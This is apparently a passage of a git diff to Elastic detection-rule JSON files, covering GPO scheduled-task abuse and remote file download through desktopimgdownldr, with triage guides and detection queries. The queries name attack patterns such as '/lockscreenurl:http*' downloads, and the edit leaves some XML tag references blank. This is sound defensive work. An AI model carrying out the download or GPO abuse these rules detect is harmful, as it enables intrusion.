Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json index 7dd86d4242e..092ebc4cc9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_108.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json index 1a2398c189e..e374af60dac 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_109.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json index e952f35802e..77638897c7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json index 2c04a81373f..53be0bed154 100644 --- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json index f8295b85551..69484889d41 100644 --- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` 